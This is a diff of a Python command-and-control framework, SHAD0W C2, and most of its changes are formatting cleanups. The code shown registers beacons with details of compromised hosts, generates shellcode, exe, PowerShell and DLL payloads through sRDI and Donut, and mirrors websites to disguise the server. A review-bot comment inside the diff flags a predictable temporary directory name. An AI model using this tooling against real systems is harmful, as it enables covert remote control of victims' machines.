||||
@app.errorhandler(404)
|
||||
def not_found(e):
|
||||
|
||||
|
@ -77,7 +83,8 @@ def not_found(e):
|
|||
for obj in shad0w.beacons[shad0w.current_beacon]["serve"]:
|
||||
if obj == request.path:
|
||||
return shad0w.beacons[shad0w.current_beacon]["serve"][obj]
|
||||
except: pass
|
||||
except:
|
||||
pass
|
||||
|
||||
if shad0w.mirror is None:
|
||||
return ""
|
||||
|
@ -90,10 +97,11 @@ def not_found(e):
|
|||
|
||||
return Response(data, status_code, headers)
|
||||
|
||||
|
||||
def run_serv(*args):
|
||||
# cant think of a better way doing this so guess i gotta use globals
|
||||
global shad0w, phandle
|
||||
shad0w = args[0]
|
||||
shad0w = args[0]
|
||||
|
||||
phandle = Handler(shad0w)
|
||||
|
||||
|
|
|
@ -5,6 +5,7 @@ from prompt_toolkit.patch_stdout import patch_stdout
|
|||
|
||||
from lib.commands import *
|
||||
|
||||
|
||||
class Handler(object):
|
||||
|
||||
def __init__(self, shad0w):
|
||||
|
@ -17,8 +18,8 @@ class Handler(object):
|
|||
# split command into name + args
|
||||
|
||||
splitcommand = cmd.split(" ")
|
||||
basecmd = splitcommand[0]
|
||||
cmd_args = splitcommand[0:]
|
||||
basecmd = splitcommand[0]
|
||||
cmd_args = splitcommand[0:]
|
||||
|
||||
# see if we need to execute a local command
|
||||
try:
|
||||
|
@ -35,7 +36,8 @@ class Handler(object):
|
|||
os.chdir(cwd)
|
||||
|
||||
return
|
||||
except IndexError: pass
|
||||
except IndexError:
|
||||
pass
|
||||
|
||||
# find the handle for the module in the globals list an call it with args
|
||||
|
||||
|
|
|
@ -3,9 +3,11 @@
|
|||
import re
|
||||
import requests
|
||||
|
||||
|
||||
def get_base_domain(site):
|
||||
return site.replace("https://", "").replace("http://", "").replace("/", "")
|
||||
|
||||
|
||||
def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, headers=None, data=None, cookies=None):
|
||||
try:
|
||||
if dynamic:
|
||||
|
@ -31,6 +33,7 @@ def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, head
|
|||
if htmlonly:
|
||||
return req.text
|
||||
|
||||
|
||||
def fix_internal_links(shad0w, html, site):
|
||||
# add us to paths
|
||||
if shad0w.endpoint is None:
|
||||
|
@ -50,6 +53,7 @@ def fix_internal_links(shad0w, html, site):
|
|||
|
||||
return html
|
||||
|
||||
|
||||
def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=None, cookies=None):
|
||||
|
||||
if not dynamic:
|
||||
|
@ -61,4 +65,4 @@ def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=Non
|
|||
if dynamic:
|
||||
data, headers, status_code = get_base_page(shad0w, site, dynamic=dynamic, method=method, headers=headers, data=data, cookies=cookies)
|
||||
data = fix_internal_links(shad0w, data, site)
|
||||
return data, status_code, headers
|
||||
return data, status_code, headers
|
||||
|
|
|
@ -8,7 +8,8 @@ from .responce_builder import Builder
|
|||
|
||||
DATA_CMD_OUT = 0x2000
|
||||
DATA_CMD_PRO = 0x3000
|
||||
DO_CALLBACK = 0x4000
|
||||
DO_CALLBACK = 0x4000
|
||||
|
||||
|
||||
class Handler(object):
|
||||
|
||||
|
@ -106,12 +107,12 @@ class Handler(object):
|
|||
self.shad0w.beacons[beacon_id]["num"] = self.shad0w.beacon_count
|
||||
|
||||
# store basic info about beacon
|
||||
self.shad0w.beacons[beacon_id]["domain"] = domain
|
||||
self.shad0w.beacons[beacon_id]["machine"] = machine
|
||||
self.shad0w.beacons[beacon_id]["username"] = username
|
||||
self.shad0w.beacons[beacon_id]["arch"] = arch
|
||||
self.shad0w.beacons[beacon_id]["os"] = opsystem
|
||||
self.shad0w.beacons[beacon_id]["impersonate"] = None
|
||||
self.shad0w.beacons[beacon_id]["domain"] = domain
|
||||
self.shad0w.beacons[beacon_id]["machine"] = machine
|
||||
self.shad0w.beacons[beacon_id]["username"] = username
|
||||
self.shad0w.beacons[beacon_id]["arch"] = arch
|
||||
self.shad0w.beacons[beacon_id]["os"] = opsystem
|
||||
self.shad0w.beacons[beacon_id]["impersonate"] = None
|
||||
|
||||
# if we are impersonating a session then tell that beacon
|
||||
if str(impersonate) != "None":
|
||||
|
@ -202,7 +203,6 @@ class Handler(object):
|
|||
self.shad0w.debug.log("invalid http method for stager")
|
||||
return self.builder.build(blank=True)
|
||||
|
||||
|
||||
def blank_page(self):
|
||||
# does what the function says
|
||||
return self.builder.build(blank=True)
|
||||
|
|
|
@ -10,11 +10,13 @@ from lib.templates import powershell
|
|||
|
||||
formats = ('raw', 'exe', 'psh', 'dll')
|
||||
|
||||
|
||||
def get_size(filename):
|
||||
# get the bytes of the exe
|
||||
with open(filename, 'rb') as file:
|
||||
return len(file.read())
|
||||
|
||||
|
||||
def format_raw(builder, length=True, code=False):
|
||||
# extract the shellcode from the new beacon
|
||||
rcode = buildtools.extract_shellcode()
|
||||
|
@ -28,6 +30,7 @@ def format_raw(builder, length=True, code=False):
|
|||
if code:
|
||||
return rcode
|
||||
|
||||
|
||||
def format_exe(builder, length=True, code=False):
|
||||
# get the bytes of the exe
|
||||
# with open("/root/shad0w/beacon/beacon.exe", 'rb') as file:
|
||||
|
@ -55,6 +58,7 @@ def format_exe(builder, length=True, code=False):
|
|||
with open(builder.outfile, 'rb') as file:
|
||||
return file.read()
|
||||
|
||||
|
||||
def format_powershell(builder, length=True, code=False):
|
||||
|
||||
outfile = builder.outfile
|
||||
|
@ -79,6 +83,7 @@ def format_powershell(builder, length=True, code=False):
|
|||
if code:
|
||||
return pcode
|
||||
|
||||
|
||||
def format_dll(builder, length=True, code=False):
|
||||
|
||||
# get the the beacon shellcode
|
||||
|
@ -96,6 +101,7 @@ def format_dll(builder, length=True, code=False):
|
|||
with open(builder.outfile, 'rb') as file:
|
||||
return file.read()
|
||||
|
||||
|
||||
def create(builder):
|
||||
if builder.format == "raw":
|
||||
return format_raw(builder)
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
import json
|
||||
|
||||
|
||||
class Builder(object):
|
||||
|
||||
def __init__(self, shad0w):
|
||||
|
@ -27,7 +28,8 @@ class Builder(object):
|
|||
try:
|
||||
if resp["task"] == None:
|
||||
resp["task"] = 0x1000
|
||||
except KeyError: pass
|
||||
except KeyError:
|
||||
pass
|
||||
|
||||
# now return the dict in json format
|
||||
|
||||
|
|
|
@ -5,6 +5,7 @@ import tempfile
|
|||
|
||||
from lib.ShellcodeRDI import *
|
||||
|
||||
|
||||
def generate_srdi(file, flags):
|
||||
""" generate shellcode from a reflective dll using sRDI """
|
||||
|
||||
|
@ -15,12 +16,14 @@ def generate_srdi(file, flags):
|
|||
|
||||
return ConvertToShellcode(dll_data, hfunc, b"None", flags)
|
||||
|
||||
|
||||
def parse_donut_error(data, filename):
|
||||
if "Error : File not found." in data:
|
||||
print(f"Unable to find '{filename}'.")
|
||||
else:
|
||||
print(f"Failed to execute '{filename}'.")
|
||||
|
||||
|
||||
def generate(file, args, params, parse=True):
|
||||
""" generate shellcode from a pe using Donut """
|
||||
|
||||
|
@ -110,4 +113,4 @@ def generate(file, args, params, parse=True):
|
|||
|
||||
# return the raw shellcode
|
||||
with open(temp.name, "rb") as file:
|
||||
return file.read()
|
||||
return file.read()
|
||||
|
|
35
lib/tools.py
35
lib/tools.py
|
@ -9,8 +9,9 @@ from datetime import datetime
|
|||
|
||||
from lib import buildtools
|
||||
|
||||
# list all command scripts in the commands dir, append to list of commands
|
||||
|
||||
def get_commands():
|
||||
# list all command scripts in the commands dir, append to list of commands
|
||||
commandList = []
|
||||
for _, _, f in os.walk("/root/shad0w/lib/commands/"):
|
||||
for file in f:
|
||||
|
@ -18,16 +19,18 @@ def get_commands():
|
|||
commandList.append(file.replace(".py",""))
|
||||
return commandList
|
||||
|
||||
|
||||
def generate_beacon_id():
|
||||
# get md5 hash of the current date + time
|
||||
return hashlib.md5(str(datetime.now()).encode()).hexdigest()
|
||||
|
||||
|
||||
def get_data_from_json(jdata):
|
||||
# get the data from data
|
||||
|
||||
id = ""
|
||||
id = ""
|
||||
opcode = 0
|
||||
data = ""
|
||||
data = ""
|
||||
|
||||
# if we get any errors, just return the above values and this req will then be ignored
|
||||
try:
|
||||
|
@ -43,18 +46,19 @@ def get_data_from_json(jdata):
|
|||
|
||||
return id, opcode, data
|
||||
|
||||
|
||||
async def compile_and_store_static(shad0w):
|
||||
# compile a static secure beacon and store it in memory
|
||||
shad0w.payloads["x64_secure_static"] = {}
|
||||
|
||||
arch = "x64"
|
||||
arch = "x64"
|
||||
platform = "windows"
|
||||
secure = "secure"
|
||||
static = "static"
|
||||
secure = "secure"
|
||||
static = "static"
|
||||
|
||||
# basically just make a random string
|
||||
dir_name = generate_beacon_id()
|
||||
lib_dir_name = "/tmp/" + dir_name + "/lib/"
|
||||
dir_name = generate_beacon_id()
|
||||
lib_dir_name = "/tmp/" + dir_name + "/lib/"
|
||||
build_dir_name = "/tmp/" + dir_name + "/build/"
|
||||
|
||||
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
|
||||
|
@ -89,6 +93,7 @@ async def compile_and_store_static(shad0w):
|
|||
|
||||
return
|
||||
|
||||
|
||||
async def compile_and_store_static_srdi(shad0w):
|
||||
# compile a static secure beacon and store it in memory
|
||||
shad0w.payloads["x64_secure_static_srdi"] = {}
|
||||
|
@ -99,14 +104,14 @@ async def compile_and_store_static_srdi(shad0w):
|
|||
static = "static"
|
||||
|
||||
# basically just make a random string
|
||||
dir_name = generate_beacon_id()
|
||||
lib_dir_name = "/tmp/" + dir_name + "/lib/"
|
||||
dir_name = generate_beacon_id()
|
||||
lib_dir_name = "/tmp/" + dir_name + "/lib/"
|
||||
build_dir_name = "/tmp/" + dir_name + "/build/"
|
||||
|
||||
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
|
||||
Path(build_dir_name).mkdir(parents=True, exist_ok=True)
|
||||
|
||||
mod_name = f"{build_dir_name}../beacon.dll"
|
||||
mod_name = f"{build_dir_name}../beacon.dll"
|
||||
|
||||
os.system(f"cp -r /root/shad0w/beacon/lib/* {lib_dir_name}")
|
||||
|
||||
|
@ -136,13 +141,15 @@ async def compile_and_store_static_srdi(shad0w):
|
|||
shad0w.compile_finished = True
|
||||
return
|
||||
|
||||
|
||||
def loading_banner(shad0w):
|
||||
while shad0w.compile_finished != True:
|
||||
loading = list("Starting SHAD0W C2...")
|
||||
iter = 1
|
||||
colour = random.choice([1,2,3,4,5,6])
|
||||
colour = random.choice([1, 2, 3, 4, 5, 6])
|
||||
for i in loading:
|
||||
if shad0w.compile_finished == True: break
|
||||
if shad0w.compile_finished == True:
|
||||
break
|
||||
time.sleep(0.15)
|
||||
|
||||
i = f"\033[1;3{colour}m" + i + "\033[0m"
|
||||
|
@ -154,4 +161,4 @@ def loading_banner(shad0w):
|
|||
sys.stdout.write("\r" + " "*100 + "\r")
|
||||
sys.stdout.flush()
|
||||
|
||||
shad0w.screen_finish = True
|
||||
shad0w.screen_finish = True
|
||||
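Review bot: The comment `# basically just make a random string` in `compile_and_store_static` and `compile_and_store_static_srdi` does not match what `generate_beacon_id()` returns, which is an MD5 hex digest of `str(datetime.now())`, derived from the clock rather than from a random source. That value names a build directory under `/tmp` created with `mkdir(parents=True, exist_ok=True)`, so on a shared host another local user could guess or pre-create the path and the build would silently reuse it. Creating the directory with `dir_name = tempfile.mkdtemp(prefix="shad0w-")` and dropping the `"/tmp/" +` prefix from the `lib_dir_name` and `build_dir_name` joins would give an unpredictable, owner-only location; whether `tempfile` is already imported in this file is not visible here. Both function bodies continue outside the hunks shown.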
|
|
35
shad0w.py
35
shad0w.py
|
@ -19,6 +19,7 @@ from lib import mirror
|
|||
from lib import payload_format
|
||||
from lib import tools
|
||||
|
||||
|
||||
class Shad0wC2(object):
|
||||
|
||||
def __init__(self, args):
|
||||
|
@ -26,42 +27,42 @@ class Shad0wC2(object):
|
|||
super(Shad0wC2, self).__init__()
|
||||
|
||||
# payload store
|
||||
self.payloads = {}
|
||||
self.payloads = {}
|
||||
|
||||
# declare all the vitial variables to run.
|
||||
self.addr = (args['address'], args['port'])
|
||||
self.debugv = args['debug']
|
||||
self.sslkey = args['key']
|
||||
self.sslcrt = args['cert']
|
||||
self.addr = (args['address'], args['port'])
|
||||
self.debugv = args['debug']
|
||||
self.sslkey = args['key']
|
||||
self.sslcrt = args['cert']
|
||||
|
||||
# framework variables
|
||||
self.variables = {}
|
||||
self.variables = {}
|
||||
|
||||
# set the msf callback size
|
||||
self.variables["MsfUriSize"] = 1337
|
||||
|
||||
# website we can mirror
|
||||
self.mirror = args['mirror']
|
||||
self.mirror = args['mirror']
|
||||
|
||||
# endpoint for modules to callback to
|
||||
self.endpoint = args['endpoint']
|
||||
self.endpoint = args['endpoint']
|
||||
|
||||
# runtime variables
|
||||
self.beacons = {}
|
||||
self.beacon_count = 0
|
||||
self.current_beacon = None
|
||||
self.beacons = {}
|
||||
self.beacon_count = 0
|
||||
self.current_beacon = None
|
||||
|
||||
# loading screen stuff
|
||||
self.screen_finish = False
|
||||
self.screen_finish = False
|
||||
|
||||
# get the debug/logging stuff ready
|
||||
self.debug = debug.Debug(self.debugv)
|
||||
self.debug = debug.Debug(self.debugv)
|
||||
|
||||
# console class
|
||||
self.console = console.Console(self)
|
||||
self.console = console.Console(self)
|
||||
|
||||
# super useful
|
||||
self.crypt = encryption
|
||||
self.crypt = encryption
|
||||
|
||||
def start(self):
|
||||
|
||||
|
@ -156,8 +157,6 @@ class Shad0wBuilder(object):
|
|||
print("\033[1;32m[+]\033[0m", f"Created {self.outfile} ({length} bytes)")
|
||||
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
# sort the first cmd switch to decide weather we beacon or listen
|
||||
|
@ -201,4 +200,4 @@ if __name__ == '__main__':
|
|||
if args["mode"] == "beacon":
|
||||
# build the beacon
|
||||
shad0w = Shad0wBuilder(args)
|
||||
shad0w.build()
|
||||
shad0w.build()
|
||||
|
|